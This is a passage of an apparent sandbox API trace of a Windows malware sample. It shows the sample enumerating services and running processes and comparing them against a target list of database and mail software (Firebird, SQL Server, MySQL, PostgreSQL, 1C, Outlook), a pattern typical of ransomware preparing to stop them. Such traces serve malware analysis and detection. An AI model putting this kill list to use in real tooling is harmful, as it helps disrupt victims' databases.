(lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0054.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0054.751] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0054.751] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0054.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0054.752] lstrlenW (lpString="nsi") returned 3 [0054.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0054.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0054.752] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0054.752] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0054.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0054.752] lstrlenW (lpString="PcaSvc") returned 6 [0054.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0054.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0054.752] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0054.752] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0054.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0054.752] lstrlenW (lpString="PlugPlay") returned 8 [0054.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0054.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0054.752] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0054.752] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0054.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0054.752] lstrlenW (lpString="Power") returned 5 [0054.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0054.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0054.752] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0054.752] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0054.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0054.752] lstrlenW (lpString="ProfSvc") returned 7 [0054.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0054.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0054.752] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0054.752] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0054.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0054.752] lstrlenW (lpString="RpcEptMapper") returned 12 [0054.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0054.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0054.752] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0054.752] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0054.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0054.752] lstrlenW (lpString="RpcSs") returned 5 [0054.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0054.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0054.753] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0054.753] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0054.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0054.753] lstrlenW (lpString="SamSs") returned 5 [0054.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0054.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0054.753] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0054.753] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0054.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0054.753] lstrlenW (lpString="Schedule") returned 8 [0054.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0054.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0054.753] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0054.753] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0054.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0054.753] lstrlenW (lpString="SENS") returned 4 [0054.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0054.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0054.753] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0054.753] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0054.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0054.753] lstrlenW (lpString="ShellHWDetection") returned 16 [0054.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0054.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0054.753] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0054.753] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0054.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0054.753] lstrlenW (lpString="Spooler") returned 7 [0054.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0054.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0054.753] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0054.753] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0054.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0054.753] lstrlenW (lpString="swprv") returned 5 [0054.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0054.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0054.753] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0054.753] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0054.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0054.754] lstrlenW (lpString="SysMain") returned 7 [0054.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0054.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0054.754] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0054.754] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0054.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0054.754] lstrlenW (lpString="Themes") returned 6 [0054.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0054.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0054.754] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0054.754] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0054.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0054.754] lstrlenW (lpString="TrkWks") returned 6 [0054.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0054.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0054.754] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0054.754] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0054.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0054.754] lstrlenW (lpString="UxSms") returned 5 [0054.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0054.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0054.754] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0054.754] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0054.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0054.754] lstrlenW (lpString="VSS") returned 3 [0054.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0054.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0054.754] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0054.754] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0054.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0054.754] lstrlenW (lpString="WdiServiceHost") returned 14 [0054.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0054.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0054.754] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0054.754] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0054.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0054.754] lstrlenW (lpString="WdiSystemHost") returned 13 [0054.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0054.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0054.755] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0054.755] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0054.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0054.755] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0054.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0054.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0054.755] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0054.755] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0054.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0054.755] lstrlenW (lpString="Winmgmt") returned 7 [0054.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0054.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0054.755] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0054.755] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0054.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0054.755] lstrlenW (lpString="WPDBusEnum") returned 10 [0054.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0054.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0054.755] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0054.755] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0054.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0054.755] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3940ef0 | out: hHeap=0x600000) returned 1 [0054.755] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x204 [0054.757] Process32FirstW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0054.758] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0054.758] lstrlenW (lpString="System") returned 6 [0054.758] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0054.758] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0054.758] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0054.759] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0054.759] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0054.759] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0054.759] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0054.759] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0054.759] lstrlenW (lpString="smss.exe") returned 8 [0054.759] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0054.759] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0054.759] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0054.759] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0054.759] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0054.759] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0054.760] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0054.760] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0054.760] lstrlenW (lpString="csrss.exe") returned 9 [0054.760] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0054.760] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0054.760] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0054.760] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0054.760] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0054.760] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0054.760] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0054.760] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0054.761] lstrlenW (lpString="wininit.exe") returned 11 [0054.761] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0054.761] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0054.761] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0054.761] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0054.762] lstrlenW (lpString="csrss.exe") returned 9 [0054.762] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0054.762] lstrlenW (lpString="winlogon.exe") returned 12 [0054.762] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0054.763] lstrlenW (lpString="services.exe") returned 12 [0054.763] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0054.764] lstrlenW (lpString="lsass.exe") returned 9 [0054.764] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0054.764] lstrlenW (lpString="lsm.exe") returned 7 [0054.764] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.765] lstrlenW (lpString="svchost.exe") returned 11 [0054.765] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.766] lstrlenW (lpString="svchost.exe") returned 11 [0054.766] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.766] lstrlenW (lpString="svchost.exe") returned 11 [0054.766] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.767] lstrlenW (lpString="svchost.exe") returned 11 [0054.767] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.768] lstrlenW (lpString="svchost.exe") returned 11 [0054.768] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0054.768] lstrlenW (lpString="audiodg.exe") returned 11 [0054.768] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.769] lstrlenW (lpString="svchost.exe") returned 11 [0054.769] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.769] lstrlenW (lpString="svchost.exe") returned 11 [0054.769] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0054.770] lstrlenW (lpString="dwm.exe") returned 7 [0054.770] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0054.771] lstrlenW (lpString="explorer.exe") returned 12 [0054.771] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0054.771] lstrlenW (lpString="spoolsv.exe") returned 11 [0054.771] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0054.772] lstrlenW (lpString="taskhost.exe") returned 12 [0054.772] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.772] lstrlenW (lpString="svchost.exe") returned 11 [0054.772] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0054.773] lstrlenW (lpString="taskeng.exe") returned 11 [0054.773] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0054.774] lstrlenW (lpString="taskhost.exe") returned 12 [0054.774] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0054.774] lstrlenW (lpString="challenging.exe") returned 15 [0054.774] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0054.775] lstrlenW (lpString="pgp prix.exe") returned 12 [0054.775] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0054.776] lstrlenW (lpString="user-reno.exe") returned 13 [0054.776] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0054.776] lstrlenW (lpString="aggregate.exe") returned 13 [0054.776] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0054.777] lstrlenW (lpString="dressed.exe") returned 11 [0054.777] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0054.778] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0054.778] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0054.778] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0054.779] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0054.779] lstrlenW (lpString="developing.exe") returned 14 [0054.779] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0054.787] lstrlenW (lpString="supported.exe") returned 13 [0054.787] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0054.787] lstrlenW (lpString="girlstionselect.exe") returned 19 [0054.787] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0054.788] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0054.788] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: 